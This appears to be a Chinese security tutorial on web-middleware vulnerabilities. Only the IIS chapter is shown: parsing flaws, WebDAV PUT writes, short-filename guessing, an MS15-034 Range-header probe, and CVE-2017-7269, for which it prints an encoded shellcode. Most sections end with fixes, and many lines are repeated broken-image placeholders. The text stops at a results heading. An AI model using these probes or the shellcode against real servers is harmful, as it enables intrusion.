Bootstrap

Web中间件常见安全漏洞

  • 第一章:IIS

    • IIS 6 解析漏洞

    • IIS 7 解析漏洞

    • PUT任意文件写入

    • IIS短文件漏洞

    • HTTP.SYS远程代码执行 (MS15-034)

    • RCE-CVE-2017-7269

  • 第二章:Apache

    • 未知扩展名解析漏洞

    • AddHandler导致的解析漏洞

    • Apache HTTPD 换行解析漏洞(CVE-2017-15715)

  • 第三章:Nginx

    • Nginx配置文件错误导致的解析漏洞

    • Nginx 空字节任意代码执行漏洞

    • Nginx 文件名逻辑漏洞(CVE-2013-4547)

    • Nginx 配置错误导致的安全问题

  • 第四章:Tomcat

    • Tomcat 任意文件写入(CVE-2017-12615)

    • Tomcat 远程代码执行(CVE-2019-0232)

    • Tomcat + 弱口令 && 后台getshell漏洞

    • Tomcat manager App 暴力破解

  • 第五章:JBoss

    • JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

    • JBoss JMXInvokerServlet 反序列化漏洞

    • JBoss EJBInvokerServlet 反序列化漏洞

    • JBoss <=4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    • Administration Console 弱口令

    • JMX Console未授权访问

  • 第六章:weblogic

    • XMLDecoder 反序列化漏洞(CVE-2017-10271 & CVE-2017-3506)

    • Weblogic wls9_async_response,wls-wsat 反序列化远程代码执行漏洞(CVE-2019-2725)

    • Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

    • Weblogic 任意文件上传漏洞(CVE-2018-2894)

    • Weblogic SSRF漏洞 (CVE-2014-4210)

    • Weblogic 弱口令 && 后台getshell

  • 第七章:GlassFish

    • GlassFish Directory Traversal(CVE-2017-1000028)

    • GlassFish 后台Getshell

  • 第八章:WebSphere

    • Java反序列化(CVE-2015-7450)

    • 弱口令 && 后台Getshell

 


1、IIS

IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。

IIS 6 解析漏洞

基于文件名,该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消基于文件夹名,该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消另外,IIS6.x除了会将扩展名为.asp的文件解析为asp之外,还默认会将扩展名为.asa,.cdx,.cer解析为asp,

从网站属性->主目录->配置 可以看出,他们都是调用了asp.dll进行的解析。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

修复建议

由于微软并不认为这是一个漏洞,也没有推出IIS 6.0的补丁,因此漏洞需要自己修复。

1、限制上传目录执行权限,不允许执行脚本。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

2、不允许新建目录。

3.、上传的文件需经过重命名(时间戳+随机数+.jpg等)

IIS 7 解析漏洞

1、安装IIS7.5,控制面板 -> 程序 -> 打开或关闭windows功能。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

2、下载php-5.2.6-win32-installer.msi

3、打开msi,一直下一步来到选择web server setup的界面,在这里选择IIS fastcgi,之后一直下一步。

4、打开IIS,管理工具 ->Internet 信息服务(IIS)管理器

5、选择编辑ISAPI或者CGI限制

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

添加安装的php-cgi.exe路径,描述随意。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

6、返回第五步的第一个图片位置,点击处理程序映射,添加如下。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

7、phpinfo测试

 

IIS7.x版本 在Fast-CGI运行模式下,在任意文件,例:test.jpg后面加上/.php,会将test.jpg 解析为php文件。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

修复建议

配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

结果如下:

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

PUT任意文件写入

IIS Server 在 Web 服务扩展中开启了 WebDAV之后,支持多种请求,配合写入权限,可造成任意文件写入。

 

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

修复建议

关闭WebDAV 和 写权限

IIS短文件漏洞

Windows 以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件。在cmd下输入”dir /x”即可看到短文件名的效果。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

IIS短文件名产生:

1、当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位。2、当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名。

目前IIS支持短文件名猜测的HTTP方法主要包括:DEBUG、OPTIONS、GET、POST、HEAD、TRACE六种。
IIS 8.0之后的版本只能通过OPTIONS和TRACE方法被猜测成功。

复现:

IIS8.0以下版本需要开启ASP.NET支持,IIS大于等于8.0版本,即使没有安装ASP.NET,通过OPTIONS和TRACE方法也可以猜解成功。
以下通过开启IIS6.0 ASP.NET后进行复现。

 

当访问构造的某个存在的短文件名,会返回404;

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

当访问构造的某个不存在的短文件名,会返回400;

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

IIS短文件漏洞局限性
1) 如果文件名本身太短也是无法猜解的;
2) 此漏洞只能确定前6个字符,如果后面的字符太长、包含特殊字符,很难猜解;
3) 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配;
4) 如果文件夹名前6位字符带点”.”,扫描程序会认为是文件而不是文件夹,最终出现误报;
5) 不支持中文文件名,包括中文文件和中文文件夹。一个中文相当于两个英文字符,故超过4个中文字会产生短文件名,但是IIS不支持中文猜测。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

 

修复建议

1)从CMD命令关闭NTFS 8.3文件格式的支持

Windows Server 2003:(1代表关闭,0代表开启)
关闭该功能:fsutil behavior set disable8dot3 1

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

Windows Server 2008 R2:

查询是否开启短文件名功能:fsutil 8dot3name query
关闭该功能:fsutil 8dot3name set 1

不同系统关闭命令稍有区别,该功能默认是开启的.

2)或从修改注册表关闭NTFS 8.3文件格式的支持

快捷键Win+R打开命令窗口,输入regedit打开注册表窗口

找到路径:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem,将其中的 NtfsDisable8dot3NameCreation这一项的值设为 1,1代表不创建短文件名格式

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

以上两种方式修改完成后,均需要重启系统生效。

Note:此方法只能禁止NTFS8.3格式文件名创建,已经存在的文件的短文件名无法移除,需要重新复制才会消失。
例:将web文件夹的内容拷贝到另一个位置,如c:\www到c:\ww,然后删除原文件夹,再重命名c:\ww到c:\www。

HTTP.SYS远程代码执行 (MS15-034)

影响范围:
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

复现:

在Windows7上 安装IIS7.5。
1、访问。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

2、编辑请求头,增加Range: bytes=0-18446744073709551615字段,若返回码状态为416 Requested Range Not Satisfiable,则存在HTTP.SYS远程代码执行漏洞

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

漏洞有点鸡肋,配合其他漏洞使用还是可以用用的,具体使用可转至MSF中。

修复建议

安装修复补丁(KB3042553)

RCE-CVE-2017-7269

Microsoft Windows Server 2003 R2中的Internet信息服务(IIS)6.0中的WebDAV服务中的ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以”If:<http://“开头的长标头执行任意代码PROPFIND请求。

影响范围:
在Windows 2003 R2(Microsoft(R) Windows(R) Server 2003, Enterprise Edition Service Pack 2)上使用IIS 6.0并开启WebDAV扩展。

复现:
CVE作者给出的exp 计算机弹弹弹!!!
用python2 运行,结果如下。

640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gifuploading.4e448015.gif转存失败重新上传取消uploading.4e448015.gif正在上传…重新上传取消640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1uploading.4e448015.gif转存失败重新上传取消

任务管理器开启了calc.exe进程,因为计算器是网络服务权限打开的,所以我们在桌面上看不见。

这个漏洞有几个需要注意的地方,如下。

由于作者提供的Exp执行之后就卡在那里了,因此不适合用弹计算机的shellcode进行测试,网上找了个dalao的回显shellcode来测试。

首先将上图中python2 IDE运行时产生的Raw类型的HTTP数据包copy保存至记事本中,然后在Burp Repeater模块 Paste from file。

将shellcode更换成如下:

  •  
VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPP3GP0PPP36VXLKM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A

结果:

;